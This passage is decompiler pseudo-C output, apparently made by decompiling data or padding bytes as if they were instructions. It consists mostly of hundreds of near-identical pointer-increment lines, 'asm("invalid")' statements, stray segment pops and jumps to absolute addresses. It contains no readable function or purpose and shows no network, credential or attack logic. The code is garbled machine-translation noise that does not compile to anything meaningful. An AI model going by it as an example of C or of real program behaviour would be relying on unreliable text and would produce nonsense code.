				 *((intOrPtr*)(0x76 + _t1276 + 0x20d00040)) =  *((intOrPtr*)(0x76 + _t1276 + 0x20d00040)) + _t1245;
				_t1246 = _t1245 + 1;
				 *_t966 =  *_t966 + _t966;
				 *_t966 =  *_t966 + _t966;
				_t424 = _t966 - 0x41;
				 *_t424 =  *((intOrPtr*)(_t966 - 0x41)) + _t1220;
				if ( *_t424 <= 0) goto L65;
				 *_t966 =  *_t966 + _t966;
				 *_t966 =  *_t966 + _t966;
				 *_t966 =  *_t966 + _t966;
				 *_t966 =  *_t966 + _t966;
				 *_t966 =  *_t966 + _t966;
				 *_t966 =  *_t966 + _t966;
				asm("les ebx, [edi]");
				_t967 = _t966 + 1;
				 *_t1220 =  *_t1220 + _t967;
				 *_t967 =  *_t967 + _t967;
				 *0x0000012C =  *((intOrPtr*)(0x12c)) + _t1246;
				 *_t967 =  *_t967 + _t967;
				asm("les ebx, [edi]");
				_t968 = _t967 + 1;
				 *_t1220 =  *_t1220 + _t968;
				 *_t968 =  *_t968 + _t968;
				ds = ds;
				_t970 = _t968 + _t1220 + 1;
				 *_t970 =  *_t970 + _t970;
				 *_t970 =  *_t970 + _t970;
				_pop(ds);
				_t972 = _t970 + _t1220 + 1;
				 *_t1220 =  *_t1220 + _t972;
				 *_t972 =  *_t972 + _t972;
				_pop(ds);
				_t974 = _t972 + _t1220 + 1;
				 *_t974 =  *_t974 + _t974;
				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1246;
				_pop(ds);
				_t976 = _t974 + _t1246 + 1;
				 *_t976 =  *_t976 + _t1246;
				_pop(_t1200);
				_t1247 = _t1246 + 1;
				 *_t976 =  *_t976 + _t976;
				 *_t976 =  *_t976 + _t976;
				_t978 = _t976 + _t976 | 0x00000076;
				 *0x3FB4012C =  *((intOrPtr*)(0x3fb4012c)) + _t978;
				_t979 = _t978 + 1;
				 *_t979 =  *_t979 + _t979;
				_pop(ds);
				 *((intOrPtr*)(_t979 + _t979)) =  *((intOrPtr*)(_t979 + _t979)) + _t1247;
				 *_t979 =  *_t979 + _t979;
				_t980 = _t979 + 1;
				_t1201 = _t1200 + _t1200;
				asm("invalid");
				 *_t980 =  *_t980 + 1;
				 *_t980 =  *_t980 + _t980;
				 *_t980 =  *_t980 + _t980;
				 *_t980 =  *_t980 + _t980;
				_pop(ds);
				_t982 = _t980 + _t1247 + 1;
				 *_t982 =  *_t982 + _t1247;
				_pop(_t1248);
				if ( *_t982 >= 0) goto L66;
				_t983 = _t1297;
				_t1298 = _t982;
				asm("invalid");
				asm("invalid");
				 *_t983 =  *_t983 + _t983;
				 *_t983 =  *_t983 + _t983;
				asm("int3");
				_pop(ds);
				_t984 = _t983 + 1;
				 *((intOrPtr*)(0x76 + _t1201 + 0x40)) =  *((intOrPtr*)(0x76 + _t1201 + 0x40)) + _t1220;
				 *((intOrPtr*)(_t984 + 0x11)) =  *((intOrPtr*)(_t984 + 0x11)) + _t1248;
				 *((intOrPtr*)(_t1276 + 0x11)) =  *((intOrPtr*)(_t1276 + 0x11)) + _t1248;
				_t986 = _t984 + 2;
				 *((intOrPtr*)(_t1220 + _t1248 + 0x40)) =  *((intOrPtr*)(_t1220 + _t1248 + 0x40)) + _t1201;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t986 =  *_t986 + _t986;
				 *_t1220 =  *_t1220 + _t986;
				 *0x76 =  *0x76 + _t986;
				 *((intOrPtr*)(_t986 + 0x35)) =  *((intOrPtr*)(_t986 + 0x35)) + _t986;
				_t987 = _t986 + 1;
				 *_t987 =  *_t987 + _t987;
				 *_t987 =  *_t987 + _t987;
				 *((intOrPtr*)(_t987 - 0xffbdeb)) =  *((intOrPtr*)(_t987 - 0xffbdeb)) + _t1201;
				asm("invalid");
				 *_t987 =  *_t987 + 1;
				 *_t987 =  *_t987 + _t987;
				 *((intOrPtr*)(0x76 + _t1276)) =  *((intOrPtr*)(0x76 + _t1276)) + _t987;
				_t988 = _t987 + 1;
				 *((intOrPtr*)(_t988 + 0x42)) =  *((intOrPtr*)(_t988 + 0x42)) + _t1248;
				 *_t988 =  *_t988 + _t988;
				 *_t988 =  *_t988 + _t988;
				 *_t988 =  *_t988 + _t988;
				 *_t988 =  *_t988 + _t988;
				 *_t988 =  *_t988 + _t988;
				 *_t988 =  *_t988 + _t988;
				 *_t988 =  *_t988 + _t988;
				 *_t988 =  *_t988 + _t988;
				 *_t988 =  *_t988 & _t988;
				 *_t988 =  *_t988 + _t988;
				 *_t988 =  *_t988 + _t988;
				asm("aam 0x3e");
				_t989 = _t988 + 1;
				 *_t989 =  *_t989 + _t989;
				 *_t989 =  *_t989 + _t989;
				 *_t989 =  *_t989 + _t989;
				 *_t989 =  *_t989 & _t989;
				 *_t989 =  *_t989 + _t989;
				 *_t989 =  *_t989 + _t989;
				 *_t1220 =  *_t1220 | _t989;
				_t990 = _t989 + 1;
				 *_t990 =  *_t990 + _t990;
				 *_t990 =  *_t990 + _t990;
				 *_t1220 =  *_t1220 + _t990;
				_t991 = _t990 + 1;
				 *_t1220 =  *_t1220 + _t991;
				 *_t991 =  *_t991 + _t991;
				 *_t991 = _t1220 +  *_t991;
				 *_t991 =  *_t991 & _t991;
				 *_t991 =  *_t991 + _t991;
				 *_t991 =  *_t991 & _t991;
				asm("sbb al, 0x70");
				_t1249 = _t1248 + 1;
				 *_t991 =  *_t991 + _t991;
				 *_t991 =  *_t991 + _t991;
				_t1277 = _t1276 |  *_t1276;
				asm("in al, 0x3e");
				_t995 = _t991 + _t1249 + 1 + _t1249 + 1;
				 *_t995 =  *_t995 + _t995;
				ds = 0x30006c00;
				 *((intOrPtr*)(_t995 + _t995)) =  *((intOrPtr*)(_t995 + _t995)) + _t1249;
				 *_t995 =  *_t995 + _t995;
				_t996 = _t995 + 1;
				asm("invalid");
				 *_t996 =  *_t996 + 1;
				 *_t996 =  *_t996 + _t996;
				 *_t996 =  *_t996 + _t996;
				 *_t996 =  *_t996 + _t996;
				 *_t996 =  *_t996 + _t1249;
				 *_t996 =  *_t996 & _t996;
				asm("adc [edx+0x71], bl");
				 *((intOrPtr*)(_t1249 + 0xffffffffffff00b6)) =  *((intOrPtr*)(_t1249 + 0xffffffffffff00b6)) + _t1249;
				asm("invalid");
				 *_t996 =  *_t996 + _t996;
				 *_t996 =  *_t996 + _t996;
				 *_t1220 =  *_t1220 | _t996;
				_t997 = _t996 + 1;
				_t470 = _t997 + 0x70004020;
				 *_t470 =  *((intOrPtr*)(_t997 + 0x70004020)) + _t1220;
				asm("adc [eax], eax");
				if( *_t470 > 0) {
					_t997 = _t997 + 1;
					 *((intOrPtr*)(_t1220 + _t1249 + 0x40)) =  *((intOrPtr*)(_t1220 + _t1249 + 0x40)) + 1;
					 *_t997 =  *_t997 + _t997;
					 *_t997 =  *_t997 + _t997;
					 *_t997 =  *_t997 + _t997;
					 *_t997 =  *_t997 + _t997;
					 *_t997 =  *_t997 + _t997;
					 *_t997 =  *_t997 + _t997;
				}
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t1220 =  *_t1220 + _t997;
				 *0x40356000 =  *0x40356000 + _t1220;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + _t997;
				 *_t997 =  *_t997 + 2;
				asm("adc al, 0x42");
				asm("invalid");
				 *_t997 =  *_t997 + 1;
				 *_t997 =  *_t997 + _t997;
				 *((intOrPtr*)(_t997 + 0x76)) =  *((intOrPtr*)(_t997 + 0x76)) + _t997;
				_t998 = _t997 + 1;
				 *_t1220 = _t1220 +  *_t1220;
				_t1250 = _t1249 + 1;
				 *_t998 =  *_t998 + _t998;
				 *_t998 =  *_t998 + _t998;
				 *((intOrPtr*)(_t998 + 0x76be)) =  *((intOrPtr*)(_t998 + 0x76be)) + 4;
				 *_t998 =  *_t998 + _t998;
				 *_t998 =  *_t998 + _t998;
				 *_t998 =  *_t998 + _t998;
				 *_t998 =  *_t998 + _t998;
				 *_t998 =  *_t998 + _t998;
				 *_t1250 =  *_t1250 + 4;
				_t999 = _t998 + 1;
				 *_t1220 =  *_t1220 + _t999;
				 *_t999 =  *_t999 + _t999;
				 *((intOrPtr*)(_t999 + 0x40 + _t999 * 2)) =  *((intOrPtr*)(_t999 + 0x40 + _t999 * 2)) + _t1250;
				 *_t999 =  *_t999 + _t999;
				 *_t999 =  *_t999 + _t999;
				 *_t1250 =  *_t1250 + 4;
				_t1000 = _t999 + 1;
				 *_t1220 =  *_t1220 + _t1000;
				 *_t1000 =  *_t1000 + _t1000;
				 *((intOrPtr*)(_t1250 + 0x40)) =  *((intOrPtr*)(_t1250 + 0x40)) + _t1000;
				 *_t1000 =  *_t1000 + _t1000;
				 *_t1000 =  *_t1000 + _t1000;
				 *((intOrPtr*)(_t1000 + 0x22)) =  *((intOrPtr*)(_t1000 + 0x22)) + _t1000;
				_t1001 = _t1000 + 1;
				 *_t1220 =  *_t1220 + _t1001;
				 *_t1001 =  *_t1001 + _t1001;
				 *((intOrPtr*)(_t1250 + 0x40)) =  *((intOrPtr*)(_t1250 + 0x40)) + _t1001;
				 *_t1001 =  *_t1001 + _t1001;
				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1250;
				 *((intOrPtr*)(_t1250 + 0x40)) =  *((intOrPtr*)(_t1250 + 0x40)) + _t1220;
				 *((intOrPtr*)(_t1277 + _t1001 * 2)) =  *((intOrPtr*)(_t1277 + _t1001 * 2)) + _t1001;
				_t1251 = _t1250 + 1;
				 *_t1001 =  *_t1001 + _t1001;
				 *_t1001 =  *_t1001 + _t1001;
				 *((intOrPtr*)(_t1001 + 0x6400768c)) =  *((intOrPtr*)(_t1001 + 0x6400768c)) + 4;
				_t1003 = _t1001 + 2;
				 *((intOrPtr*)(_t1003 + 0x40 + _t1003 * 2)) =  *((intOrPtr*)(_t1003 + 0x40 + _t1003 * 2)) + _t1251;
				 *_t1003 =  *_t1003 + _t1003;
				_pop(ds);
				 *((intOrPtr*)(_t1003 + _t1003)) =  *((intOrPtr*)(_t1003 + _t1003)) + _t1251;
				 *_t1003 =  *_t1003 + _t1003;
				_t1004 = _t1003 + 1;
				asm("invalid");
				 *_t1004 =  *_t1004 + 1;
				 *_t1004 =  *_t1004 + _t1004;
				 *_t1004 =  *_t1004 + _t1004;
				 *_t1004 =  *_t1004 + _t1004;
				 *((intOrPtr*)(_t1251 + 0x40)) =  *((intOrPtr*)(_t1251 + 0x40)) + _t1220;
				 *_t1004 =  *_t1004 + _t1251;
				_pop(_t1252);
				if ( *_t1004 >= 0) goto L69;
				_t1005 = _t1298;
				asm("invalid");
				asm("invalid");
				 *_t1005 =  *_t1005 + _t1005;
				 *_t1005 =  *_t1005 + _t1005;
				_t1300 = _t1004 + 1;
				asm("les esp, [ecx]");
				_t1007 = (_t1005 &  *_t1005) + 1;
				 *((intOrPtr*)(_t1007 + 0x11)) =  *((intOrPtr*)(_t1007 + 0x11)) + _t1252;
				 *((intOrPtr*)(_t1277 + 0x11)) =  *((intOrPtr*)(_t1277 + 0x11)) + _t1252;
				_t1009 = _t1007 + 2;
				 *((intOrPtr*)(_t1220 + _t1252 + 0x40)) =  *((intOrPtr*)(_t1220 + _t1252 + 0x40)) + 8;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1009 =  *_t1009 + _t1009;
				 *_t1220 =  *_t1220 + _t1009;
				 *_t1009 =  *_t1009 + _t1220;
				 *((intOrPtr*)(_t1009 + 0x35)) =  *((intOrPtr*)(_t1009 + 0x35)) + _t1009;
				_t1010 = _t1009 + 1;
				 *_t1010 =  *_t1010 + _t1010;
				 *_t1010 =  *_t1010 + _t1010;
				 *((intOrPtr*)(_t1010 + 0x15)) =  *((intOrPtr*)(_t1010 + 0x15)) + 8;
				_t1253 = _t1252 + 1;
				_t1206 = 0x10;
				asm("invalid");
				 *_t1010 =  *_t1010 + 1;
				 *_t1010 =  *_t1010 + _t1010;
				 *((intOrPtr*)(0x76 + _t1277)) =  *((intOrPtr*)(0x76 + _t1277)) + _t1253;
				_t1011 = _t1010 + 1;
				 *((intOrPtr*)(_t1011 + 0x4220)) =  *((intOrPtr*)(_t1011 + 0x4220)) + _t1220;
				 *_t1011 =  *_t1011 + _t1011;
				 *_t1011 =  *_t1011 + 0x10;
				_t1221 = _t1220 - 1;
				if (_t1221 >= 0) goto L70;
				 *_t1011 =  *_t1011 + _t1011;
				 *_t1011 =  *_t1011 + _t1011;
				 *_t1011 =  *_t1011 + _t1011;
				 *_t1011 =  *_t1011 + _t1011;
				 *_t1011 =  *_t1011 + _t1011;
				 *_t1011 =  *_t1011 + _t1011;
				if( *_t1011 >= 0) {
					_t1165 = _t1011 + 1;
					 *_t1221 =  *_t1221 + _t1165;
					 *_t1165 =  *_t1165 + _t1165;
					 *((intOrPtr*)(0xec)) =  *((intOrPtr*)(0xec)) + _t1253;
					_t1166 = _t1165 + 1;
					 *_t1166 =  *_t1166 + _t1166;
					 *_t1166 =  *_t1166 + _t1166;
					 *((intOrPtr*)(_t1166 + 0x23)) =  *((intOrPtr*)(_t1166 + 0x23)) + 0x10;
					_t1011 = _t1166 + 1;
					 *_t1221 =  *_t1221 + _t1011;
					 *_t1011 =  *_t1011 + _t1011;
					 *((intOrPtr*)(_t1011 + 0x4023)) =  *((intOrPtr*)(_t1011 + 0x4023)) + _t1011;
					 *_t1011 =  *_t1011 + _t1011;
					 *0x00000050 =  *((intOrPtr*)(0x50)) + 0x10;
					 *_t1221 =  *_t1221 + _t1011;
				}
				 *_t1011 =  *_t1011 + _t1011;
				 *((intOrPtr*)(_t1011 + 0x4023)) =  *((intOrPtr*)(_t1011 + 0x4023)) + _t1011;
				 *((intOrPtr*)(0x6c006877)) =  *((intOrPtr*)(0x6c006877)) + _t1253;
				 *((intOrPtr*)(_t1011 + 0x18004023)) =  *((intOrPtr*)(_t1011 + 0x18004023)) + _t1221;
				_t1013 =  *_t1253 * 0x00000000 & 0x0000000c;
				if (_t1013 <= 0) goto L73;
				 *((intOrPtr*)(0xec)) =  *((intOrPtr*)(0xec)) + _t1253;
				_t1016 = (_t1013 & 0x0000003f) + 2;
				 *_t1016 =  *_t1016 + _t1016;
				_pop(ds);
				 *((intOrPtr*)(_t1016 + _t1016)) =  *((intOrPtr*)(_t1016 + _t1016)) + _t1253;
				 *_t1016 =  *_t1016 + _t1016;
				_t1017 = _t1016 + 1;
				_t1207 = _t1206 + _t1206;
				asm("invalid");
				 *_t1017 =  *_t1017 + 1;
				 *_t1017 =  *_t1017 + _t1017;
				 *_t1017 =  *_t1017 + _t1017;
				 *_t1017 =  *_t1017 + _t1017;
				_t551 = _t1017 + 0x10004023;
				 *_t551 =  *((intOrPtr*)(_t1017 + 0x10004023)) + _t1221;
				_pop(_t1254);
				if ( *_t551 >= 0) goto L74;
				_t1018 = _t1300;
				asm("invalid");
				asm("invalid");
				 *_t1018 =  *_t1018 + _t1018;
				 *_t1018 =  *_t1018 + _t1018;
				 *_t1207 =  *_t1207 & 0x00000040;
				 *_t1018 =  *_t1018 + _t1018;
				_t1019 = _t1018 &  *_t1018;
				if(_t1019 >= 0) {
					 *((intOrPtr*)(_t1277 + 0x11)) =  *((intOrPtr*)(_t1277 + 0x11)) + _t1254;
					_t1019 = _t1019 + 2;
					 *((intOrPtr*)(_t1221 +  &(_t1254[0x10]))) =  *((intOrPtr*)(_t1221 +  &(_t1254[0x10]))) + _t1207;
					 *_t1019 =  *_t1019 + _t1019;
					 *_t1019 =  *_t1019 + _t1019;
					 *_t1019 =  *_t1019 + _t1019;
					 *_t1019 =  *_t1019 + _t1019;
				}
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1019 =  *_t1019 + _t1019;
				 *_t1221 =  *_t1221 + _t1019;
				 *((intOrPtr*)(_t1019 + _t1019)) =  *((intOrPtr*)(_t1019 + _t1019)) + _t1221;
				asm("pushad");
				_t1020 = _t1019 ^ 0x00000040;
				 *_t1020 =  *_t1020 + _t1020;
				if( *_t1020 >= 0) {
					_t1254 =  &(_t1254[0]);
					_t1207 =  &(_t1207[_t1207]);
					asm("invalid");
					 *_t1020 =  *_t1020 + 1;
					 *_t1020 =  *_t1020 + _t1020;
					asm("aaa");
					_t1020 = _t1254 + _t1020 + 1 + _t1207;
					 *_t1254 =  *_t1254 & _t1020;
					 *_t1020 =  *_t1020 + _t1020;
				}
				 *_t1020 =  *_t1020 + _t1020;
				if ((_t1020 & 0x000000be) <= 0) goto L79;
				 *_t1020 =  *_t1020 + _t1020;
				 *_t1020 =  *_t1020 + _t1020;
				 *_t1020 =  *_t1020 + _t1020;
				 *_t1020 =  *_t1020 + _t1020;
				 *_t1020 =  *_t1020 + _t1020;
				 *_t1020 =  *_t1020 + _t1020;
				 *_t1221 =  *_t1221 + 0x25;
				 *((intOrPtr*)(0x25)) =  *((intOrPtr*)(0x25)) + 0x25;
				 *0x0000006F =  *((intOrPtr*)(0x6f)) + _t1254;
				 *((intOrPtr*)(0x26)) =  *((intOrPtr*)(0x26)) + 0x26;
				 *((intOrPtr*)(0x26)) =  *((intOrPtr*)(0x26)) + 0x26;
				_a65659 = _a65659 + _t1254;
				 *((intOrPtr*)(0x26)) =  *((intOrPtr*)(0x26)) + 0x26;
				 *((intOrPtr*)(0x26)) =  *((intOrPtr*)(0x26)) + 0x26;
				 *0x0100404A =  *((intOrPtr*)(0x100404a)) + _t1207;
				 *((intOrPtr*)(0x26)) =  *((intOrPtr*)(0x26)) + 0x26;
				 *0x00004064 =  *((intOrPtr*)(0x4064)) + _t1207;
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t1221;
				_t1281 =  &_v1;
				_t1255 =  &(_t1254[0]);
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
				 *0xFFFFFFFFFFFFFF8C =  *((intOrPtr*)(0xffffffffffffff8c)) + _t1221;
				if ( *((intOrPtr*)(0xffffffffffffff8c)) <= 0) goto L80;
				 *0x00000003 =  *((intOrPtr*)(3)) + _t1255;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				ds = 0xe4006c00;
				 *((intOrPtr*)(4)) =  *((intOrPtr*)(4)) + _t1255;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				asm("invalid");
				 *((intOrPtr*)(3)) =  *((intOrPtr*)(3)) + 1;
				 *((intOrPtr*)(3)) =  *((intOrPtr*)(3)) + 3;
				 *((intOrPtr*)(3)) =  *((intOrPtr*)(3)) + 3;
				 *((intOrPtr*)(3)) =  *((intOrPtr*)(3)) + 3;
				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t1255;
				_pop(_t1256);
				if ( *((intOrPtr*)(0)) >= 0) goto L81;
				asm("invalid");
				asm("invalid");
				 *0x4024 =  *0x4024 + 0x4024;
				 *0x4024 =  *0x4024 + 0x4024;
				 *0x00000011 =  *((intOrPtr*)(0x11)) + _t1256;
				 *((intOrPtr*)(_t1277 + 0x11)) =  *((intOrPtr*)(_t1277 + 0x11)) + _t1256;
				 *((intOrPtr*)(_t1221 + _t1256 + 0x40)) =  *((intOrPtr*)(_t1221 + _t1256 + 0x40)) + 1;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
				 *((intOrPtr*)(2)) =  *((intOrPtr*)(2)) + 2;
